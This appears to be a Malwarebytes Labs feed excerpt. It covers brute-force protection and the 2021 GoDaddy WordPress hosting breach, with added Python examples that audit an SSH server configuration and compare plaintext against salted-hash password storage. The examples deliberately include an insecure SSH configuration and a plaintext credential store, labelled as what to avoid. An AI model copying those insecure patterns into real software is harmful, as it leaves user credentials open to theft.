Not too long ago, Microsoft announced that as of September 15, 2021 you can completely remove the password from your Microsoft account and use the Microsoft Authenticator app, Windows Hello, a security key, or a verification code sent to your phone or email to sign in to Microsoft apps and services. We talked that over with a world expert on passwords, Per Thorsheim, and while we will welcome the passwordless future, there are some concerns when it comes to account recovery and what may happen when people lose access to their choice of authenticator.

How to protect your organization from brute force attacks

The ground rules of protecting against remote online attacks are basically:

  • Limit the number of open ports
  • Restrict the access to those that need it
  • Enhance security of the port and the protocol

There are applications that can help you accomplish these basic tasks if you feel the built-in tools are too hard to configure.
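As an added example of the ground rules applied to OpenSSH (this is not Malwarebytes’ code, and the weak configuration it audits is constructed), the script below parses an `sshd_config`, reports the directives an online brute-forcer benefits from, and emits corrected ones. The directive names are OpenSSH’s own; the chosen values, the `WANTED` and `WIDE_OPEN` tables and the function names are this example’s, and the `deploy` account and `10.0.0.5` address are placeholders for your own.

```python
"""Audit an OpenSSH sshd_config against the three ground rules above and
produce the corrected directives.

Added example, not Malwarebytes' code. The weak configuration is constructed;
the directive names are OpenSSH's own, the chosen values are this example's.
"""

# Constructed weak configuration: everything an online brute-forcer hopes for.
WEAK_CONFIG = """
# sshd_config (constructed example)
Port 22
ListenAddress 0.0.0.0
PermitRootLogin yes
PasswordAuthentication yes
PubkeyAuthentication yes
MaxAuthTries 10
# sshd keeps the FIRST value of a keyword, so this later line changes nothing:
PasswordAuthentication no
"""

# Acceptable values per directive; the first entry is what the fix emits.
WANTED = {
    "PermitRootLogin": ("no", "prohibit-password"),   # restrict access
    "PasswordAuthentication": ("no",),                # enhance the protocol: keys only
    "PubkeyAuthentication": ("yes",),
    "MaxAuthTries": ("3",),                           # fewer guesses per connection
}
WIDE_OPEN = {"0.0.0.0", "::", "<unset>"}              # ListenAddress values that expose every interface


def parse_sshd_config(text):
    """Return {lowercased keyword: value} with sshd's first-value-wins rule.

    Keywords are case-insensitive in sshd_config; values are not. Match
    blocks are out of scope here, so parsing stops at the first one.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Both 'Keyword value' and 'Keyword=value' forms are valid.
        parts = line.split(None, 1)
        if len(parts) == 1 and "=" in parts[0]:
            parts = parts[0].split("=", 1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if value.startswith("="):           # 'Keyword = value' form
            value = value[1:].strip()
        if key == "match":
            break
        settings.setdefault(key, value)     # first occurrence wins
    return settings


def audit(text):
    """Return (directive, current, wanted) for every rule the config fails."""
    current = parse_sshd_config(text)
    findings = []
    listen = current.get("listenaddress", "<unset>")
    if listen in WIDE_OPEN:                                     # rule 1: fewer open ports
        findings.append(("ListenAddress", listen, "<management interface address>"))
    for directive, acceptable in WANTED.items():                # rules 2 and 3
        have = current.get(directive.lower(), "<unset>")
        if have not in acceptable:
            findings.append((directive, have, acceptable[0]))
    if "allowusers" not in current and "allowgroups" not in current:
        findings.append(("AllowUsers", "<unset>", "<explicit list of accounts>"))
    return findings


def hardened_fragment(allow_users, listen_address):
    """Directives that satisfy audit(); the caller supplies the site-specific values."""
    lines = [f"ListenAddress {listen_address}"]
    lines += [f"{k} {v[0]}" for k, v in WANTED.items()]
    lines.append("AllowUsers " + " ".join(allow_users))
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    for directive, have, want in audit(WEAK_CONFIG):
        print(f"{directive}: have {have!r}, want {want!r}")
    print(hardened_fragment(["deploy"], "10.0.0.5"))  # placeholder account and address
```

One detail worth knowing: sshd keeps the first value it sees for a keyword, so appending `PasswordAuthentication no` to the end of a file that already says `yes` changes nothing. The parser applies that rule, which is why the weak configuration above is still flagged. The RDP equivalent of these steps is not covered by the script; there, restricting the listener to a VPN or gateway and enforcing account lockout serves the same three rules.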

Restricting access is the point of this post: the data tells us that a password alone is not always enough, and when you do rely on passwords, make sure to choose them wisely.

Stay safe, everyone!

The post Password usage analysis of brute force attacks on honeypot servers appeared first on Malwarebytes Labs.


Millions of GoDaddy customer data compromised in breach

Tue, 11/23/2021 - 17:41

Domain name registrar giant and hosting provider GoDaddy yesterday disclosed to the Securities and Exchange Commission (SEC) that it had suffered a security breach.

In the notice, it explained it had been compromised via an “unauthorized third-party access to our Managed WordPress hosting environment.” The unknown culprit behind the attack stole the data of up to 1.2 million active and inactive customers, including email addresses, original WordPress admin passwords, Secure File Transfer Protocol (sFTP) and database credentials, and SSL private keys.

The company said it has taken measures to secure accounts and the environment, such as resetting passwords and blocking the unauthorized third party from accessing its system, and said it will be issuing new certificates for specific customers.

GoDaddy first detected suspicious activity in its Managed WordPress hosting environment on Wednesday last week. According to initial investigations, the intruder used a compromised password to access legacy code in GoDaddy’s environment to steal data. Investigations are ongoing.

“We are sincerely sorry for this incident and the concern it causes for our customers,” wrote Demetrius Comes, GoDaddy’s Chief Information Security Officer (CISO), “We, GoDaddy leadership and employees, take our responsibility to protect our customers’ data very seriously and never want to let them down. We will learn from this incident and are already taking steps to strengthen our provisioning system with additional layers of protection.”

According to researchers from Defiant Inc, developers of Wordfence—a plugin for securing WordPress sites—GoDaddy has been handling sFTP in a way that doesn’t follow standard practices: “It appears that GoDaddy was storing sFTP credentials either as plaintext, or in a format that could be reversed into plaintext. They did this rather than using a salted hash, or a public key, both of which are considered industry best practices for sFTP. This allowed an attacker direct access to password credentials without the need to crack them.”
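As an added example (not GoDaddy’s or Defiant’s code, and not a description of how any real system is built), the two stores below show the difference the Wordfence researchers describe: a table that holds the credential in recoverable form beside one that holds only a per-user salt and a slow hash. `ITERATIONS`, the class and function names are this example’s; `hunter2` is a constructed sample password.

```python
"""Credential storage the way the Wordfence quote warns against, beside the
salted-hash form it recommends.

Added example, not GoDaddy's or Defiant's code, and not a description of any
real system: a minimal plaintext store next to a PBKDF2 store, so the
difference in what a thief obtains can be seen directly.
"""
import hashlib
import hmac
import os

ITERATIONS = 200_000   # assumed work factor; tune upward as hardware allows
HASH_LEN = 32


class PlaintextStore:
    """'Stored as plaintext': the credential table is the password list."""

    def __init__(self):
        self._rows = {}

    def add(self, user, password):
        self._rows[user] = password

    def verify(self, user, password):
        return self._rows.get(user) == password

    def leaked_table(self):
        """What an intruder who copies the table walks away with."""
        return dict(self._rows)


class SaltedHashStore:
    """Per-user random salt plus a slow hash; the table cannot be reversed."""

    def __init__(self):
        self._rows = {}

    @staticmethod
    def _derive(password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS, HASH_LEN)

    def add(self, user, password):
        salt = os.urandom(16)
        self._rows[user] = (salt, self._derive(password, salt))

    def verify(self, user, password):
        row = self._rows.get(user)
        if row is None:
            # Do the same amount of work for unknown users so the response
            # time does not reveal which account names exist.
            self._derive(password, b"\x00" * 16)
            return False
        salt, stored = row
        # Constant-time comparison: no early exit on the first differing byte.
        return hmac.compare_digest(self._derive(password, salt), stored)

    def leaked_table(self):
        """Salt and digest only; each row still costs ITERATIONS hashes per guess."""
        return {user: (salt.hex(), digest.hex()) for user, (salt, digest) in self._rows.items()}


def rows_differ_for_shared_password(store):
    """Enrol the same password under two accounts and report whether the
    stored rows differ. With salting they do, so a leaked table does not
    even reveal that two customers share a password."""
    store.add("site-a", "hunter2")
    store.add("site-b", "hunter2")
    leaked = store.leaked_table()
    return leaked["site-a"] != leaked["site-b"]


if __name__ == "__main__":
    plain, salted = PlaintextStore(), SaltedHashStore()
    plain.add("customer1", "hunter2")
    salted.add("customer1", "hunter2")
    print("plaintext leak:", plain.leaked_table())     # password readable as-is
    print("salted leak:", salted.leaked_table())       # salt and digest only
    print("salted rows differ:", rows_differ_for_shared_password(SaltedHashStore()))
```

The difference in what is stolen is the whole point of the quote: with the first store, copying the table is the same as obtaining every customer’s password, which is what the intruder is described as having done. With the second, the thief still has to guess, and each guess costs a full key derivation. For sFTP specifically, the other option the researchers mention, public-key authentication, removes the stored secret from the server entirely.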

GoDaddy customer? Here’s what to do

If you use GoDaddy’s hosting service and are unsure if your account might be one of those affected, do not leave this to chance. Act now before someone takes the opportunity to take over your account.

GoDaddy has provided a good list of steps to take to lock down an account that might be potentially compromised:

Stay safe!

The post Millions of GoDaddy customer data compromised in breach appeared first on Malwarebytes Labs.
